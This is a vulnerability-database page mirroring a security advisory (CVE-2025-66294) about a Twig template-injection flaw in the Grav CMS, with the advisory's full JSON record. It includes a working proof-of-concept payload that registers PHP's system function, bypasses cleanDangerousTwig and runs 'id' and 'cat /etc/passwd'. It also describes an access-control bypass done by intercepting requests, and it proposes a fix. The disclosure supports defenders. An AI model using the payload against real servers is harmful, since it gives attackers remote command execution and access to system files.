A Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method.

Important

First of all this vulnerability is due to weak sanitization in the method clearDangerousTwig, so any other class that calls it indirectly through for example $twig->processString to sanitize code is also vulnerable.
For this report, we will need the official Form and Admin plugin installed, also I will be chaining this with another vulnerability to allow an editor which is a user with only pages permissions to edit the process section of a form.
I made another report for the other vulnerability which is a Broken Access Control which allows a user with full permission for pages to change the process section by intercepting the request and modifying it.

Permissions Needed

The main case for this vulnerability is an editor which can unconditionally takeover the whole system through creating a vulnerable form.
Second case is as an unauthenticated user, so if the form exists already and accepts user input and puts it through evaluate_twig, a guest can takeover the system.

Details

When we make a form with a process section and a message action, when the form is submitted we get to deal with onFormProcess in form.php through the message case:

```php case 'message': $translated_string = $this->grav['language']->translate($params); $vars = array( 'form' => $form );

            /** @var Twig $twig */
            $twig = $this->grav['twig'];
            $processed_string = $twig->processString($translated_string, $vars);

            $form->message = $processed_string;
            break;

```

Which takes our parameters as in our action values, like in our case the value of our message action and sends it to processString which then calls the method cleanDangerousTwig from Security.php, now here's where we find the vulnerability is caused by two things:

First of all is weak regex which doesn't account for nested function calls, which allows us to bypass this function's sanitization
Second issue which is the evaluate and evaluate_twig functions which are allowed, and since we can call Twig syntax from inside them, it will lead to nested function calls which we can bypass and thus execute arbitrary payloads.

```php public static function cleanDangerousTwig(string $string): string { if ($string === '') { return $string; }

    $bad_twig = [
        'twig_array_map',
        'twig_array_filter',
        'call_user_func',
        'registerUndefinedFunctionCallback',
        'undefined_functions',
        'twig.getFunction',
        'core.setEscaper',
        'twig.safe_functions',
        'read_file',
    ];

    // This allows for a payload like {{ evaluate("read_file('/etc/passwd')") }}
    $string = preg_replace('/(({{\s*|{%\s*)[^}]*?(' . implode('|', $bad_twig) . ')[^}]*?(\s*}}|\s*%}))/i', '{# $1 #}', $string);
    return $string;
}

```

PoC

First to showcase how the function handles the payload, I built a small php program that replicates the behavior of cleanDangerousTwig:

```php

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "getgrav/grav"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.8.0-beta.27"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-66294"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1336",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-02T01:25:16Z",
    "nvd_published_at": "2025-12-01T21:15:52Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the `cleanDangerousTwig` method.\n\n### Important\n- First of all this vulnerability is due to weak sanitization in the method `clearDangerousTwig`, so any other class that calls it indirectly through for example `$twig-\u003eprocessString` to sanitize code is also vulnerable.\n\n- For this report, we will need the official Form and Admin plugin installed, also I will be chaining this with another vulnerability to allow an editor which is a user with only pages permissions to edit the process section of a form.\n\n- I made another report for the other vulnerability which is a Broken Access Control which allows a user with full permission for pages to change the process section by intercepting the request and modifying it.\n\n### Permissions Needed\n- The main case for this vulnerability is an editor which can unconditionally takeover the whole system through creating a vulnerable form.\n- Second case is as an unauthenticated user, so if the form exists already and accepts user input and puts it through `evaluate_twig`, a guest can takeover the system.\n\n### Details\nWhen we make a form with a process section and a `message` action, when the form is submitted we get to deal with `onFormProcess` in `form.php` through the `message` case:\n\n```php\n            case \u0027message\u0027:\n                $translated_string = $this-\u003egrav[\u0027language\u0027]-\u003etranslate($params);\n                $vars = array(\n                    \u0027form\u0027 =\u003e $form\n                );\n\n                /** @var Twig $twig */\n                $twig = $this-\u003egrav[\u0027twig\u0027];\n                $processed_string = $twig-\u003eprocessString($translated_string, $vars);\n\n                $form-\u003emessage = $processed_string;\n                break;\n```\n\nWhich takes our parameters as in our action values, like in our case the value of our `message` action and sends it to `processString` which then calls the method `cleanDangerousTwig` from `Security.php`, now here\u0027s where we find the vulnerability is caused by two things:\n\n- First of all is weak regex which doesn\u0027t account for nested function calls, which allows us to bypass this function\u0027s sanitization\n- Second issue which is the `evaluate` and `evaluate_twig` functions which are allowed, and since we can call Twig syntax from inside them, it will lead to nested function calls which we can bypass and thus execute arbitrary payloads.\n\n```php\n    public static function cleanDangerousTwig(string $string): string\n    {\n        if ($string === \u0027\u0027) {\n            return $string;\n        }\n\n        $bad_twig = [\n            \u0027twig_array_map\u0027,\n            \u0027twig_array_filter\u0027,\n            \u0027call_user_func\u0027,\n            \u0027registerUndefinedFunctionCallback\u0027,\n            \u0027undefined_functions\u0027,\n            \u0027twig.getFunction\u0027,\n            \u0027core.setEscaper\u0027,\n            \u0027twig.safe_functions\u0027,\n            \u0027read_file\u0027,\n        ];\n         \n        // This allows for a payload like {{ evaluate(\"read_file(\u0027/etc/passwd\u0027)\") }}\n        $string = preg_replace(\u0027/(({{\\s*|{%\\s*)[^}]*?(\u0027 . implode(\u0027|\u0027, $bad_twig) . \u0027)[^}]*?(\\s*}}|\\s*%}))/i\u0027, \u0027{# $1 #}\u0027, $string);\n        return $string;\n    }\n```\n\n### PoC\n\nFirst to showcase how the function handles the payload, I built a small php program that replicates the behavior of `cleanDangerousTwig`:\n\n```php\n\u003c?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n    if ($string === \u0027\u0027) {\n        return $string;\n    }\n\n    $bad_twig = [\n        \u0027twig_array_map\u0027,\n        \u0027twig_array_filter\u0027,\n        \u0027call_user_func\u0027,\n        \u0027registerUndefinedFunctionCallback\u0027,\n        \u0027undefined_functions\u0027,\n        \u0027twig.getFunction\u0027,\n        \u0027core.setEscaper\u0027,\n        \u0027twig.safe_functions\u0027,\n        \u0027read_file\u0027,\n    ];\n    $string = preg_replace(\u0027/(({{\\s*|{%\\s*)[^}]*?(\u0027 . implode(\u0027|\u0027, $bad_twig) . \u0027)[^}]*?(\\s*}}|\\s*%}))/i\u0027, \u0027{# $1 #}\u0027, $string);\n\n    return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig(\u0027$x\u0027)\");\n```\n\nWe can run the program with this payload:\n\n```bash\nphp ok.php \"{{ grav.twig.twig.registerUndefinedFunctionCallback(\u0027system\u0027) }} {% set a = grav.config.set(\u0027system.twig.undefined_functions\u0027,false) %} {{ grav.twig.twig.getFunction(\u0027cat /etc/passwd\u0027) }}\"\n```\n\nOur payload goes through and not one malicious function is filtered:\n\n```\nevaluate_twig(\u0027{# {{ grav.twig.twig.registerUndefinedFunctionCallback(\u0027system\u0027) }} #} {# {% set a = grav.config.set(\u0027system.twig.undefined_functions\u0027,false) %} #} {# {{ grav.twig.twig.getFunction(\u0027cat /etc/passwd\u0027) }} #}\u0027)\n```\n\nNow we know that our payload definitely works so let\u0027s try it through a custom form this time, as an editor:\n\n- Go to pages\n- Add a page and create a new form or choose an exiting one\n\nWe will be using another vulnerability I found which is a Broken Access Control vulnerability, which allows an editor with basically only pages rights to modify a form\u0027s action sections without being in expert mode ( please refer to [it\u0027s report](https://github.com/getgrav/grav/security/advisories/GHSA-v8x2-fjv7-8hjh) ), so when we go to our form and save it, we can intercept the request and inject the following payload into `data[_json][header][form]` which is the header for our form which we shouldn\u0027t normally be able to modify:\n\n```\n{\"name\":\"ssti-test 2\",\"fields\":{\"name\":{\"type\":\"text\",\"label\":\"Name\",\"required\":true}},\"buttons\":{\"submit\":{\"type\":\"submit\",\"value\":\"Submit\"}},\"process\":[]}\n```\n\nURL-encode it before sending it should look something like this:\n\n![image](https://github.com/user-attachments/assets/c3345f1f-c613-4534-a15c-bd1cf7e4b2f5)\n\n![image](https://github.com/user-attachments/assets/e9685357-b85d-432a-842b-27a28487b7d1)\n\nRequest sent and processed! Now when you go to our form file you can see added a process section with the value of message changed:\n\n![image](https://github.com/user-attachments/assets/c87bdc3b-712c-465f-bd0d-9951ca826a6a)\n\nContent of form:\n\n```\ntitle: Home\nprocess:\n    markdown: true\n    twig: true\nform:\n    name: test\n    fields:\n        name:\n            type: text\n            label: Name\n            required: true\n    buttons:\n        submit:\n            type: submit\n            value: submit\n    process:\n        -\n            message: \u0027{{ evaluate_twig(form.value(\u0027\u0027name\u0027\u0027)) }}\u0027\n```\n\nNow in the process section, notice our message action is gonna take value from the Name input, using the following payload we will execute the command `id` on the system:\n\n```\n{{ grav.twig.twig.registerUndefinedFunctionCallback(\u0027system\u0027) }} {% set a = grav.config.set(\u0027system.twig.undefined_functions\u0027,false) %} {{ grav.twig.twig.getFunction(\u0027id\u0027) }}\n```\n\nNow we can visit the page and input our payload, submit and we got command result:\n\n![image](https://github.com/user-attachments/assets/46571c3c-53ad-4028-b607-8c8f1c26b0c2)\n\n\n### Impact\n\nAllows an attacker to execute arbitrary commands, leading to full system compromise, including unauthorized access, data theft, privilege escalation, and disruption of services.\n\n### Recommended Fix\n\n- Blacklist both the `evaluate` and `evaluate_twig` functions.\n- We could add second check to `cleanDangerousTwig` where we would look for each malicious function no matter it\u0027s position:\n\n```php\n\u003c?php\n\nfunction cleanDangerousTwig(string $string): string\n{\n    if ($string === \u0027\u0027) {\n        return $string;\n    }\n\n    $bad_twig = [\n        \u0027twig_array_map\u0027,\n        \u0027twig_array_filter\u0027,\n        \u0027call_user_func\u0027,\n        \u0027registerUndefinedFunctionCallback\u0027,\n        \u0027undefined_functions\u0027,\n        \u0027twig.getFunction\u0027,\n        \u0027core.setEscaper\u0027,\n        \u0027twig.safe_functions\u0027,\n        \u0027read_file\u0027,\n    ];\n    $string = preg_replace(\u0027/(({{\\s*|{%\\s*)[^}]*?(\u0027 . implode(\u0027|\u0027, $bad_twig) . \u0027)[^}]*?(\\s*}}|\\s*%}))/i\u0027, \u0027{# $1 #}\u0027, $string);\n\n    foreach ($bad_twig as $func) {\n        $string = preg_replace(\u0027/\\b\u0027 . preg_quote($func, \u0027/\u0027) . \u0027(\\s*\\([^)]*\\))?\\b/i\u0027, \u0027{# $1 #}\u0027, $string);\n    }\n\n    return $string;\n}\n\n$x = $argv[1];\necho cleanDangerousTwig(\"evaluate_twig(\u0027$x\u0027)\");\n```\n\nWhen we run this, the result is:\n```\nevaluate_twig(\u0027{# {{ grav.twig.twig.{#  #}(\u0027system\u0027) }} #} {# {% set a = grav.config.set(\u0027system.twig.{#  #}\u0027,false) %} #} {# {{ grav.twig.{#  #}(\u0027cat /etc/passwd\u0027) }} #}\u0027)\n```\nYou can see we managed to stop the payload and filter out the malicious functions.",
  "id": "GHSA-662m-56v4-3r8f",
  "modified": "2025-12-02T01:25:16Z",
  "published": "2025-12-02T01:25:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/security/advisories/GHSA-662m-56v4-3r8f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66294"
    },
    {
      "type": "WEB",
      "url": "https://github.com/getgrav/grav/commit/e37259527d9c1deb6200f8967197a9fa587c6458"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/getgrav/grav"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Grav is vulnerable to RCE via SSTI through Twig Sandbox Bypass"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-66294 (GCVE-0-2025-66294)

Vulnerability from cvelistv5

fkie_cve-2025-66294

Vulnerability from fkie_nvd

ghsa-662m-56v4-3r8f

Vulnerability from github

Summary

Important

Permissions Needed

Details

PoC

Tags

Sightings

Nomenclature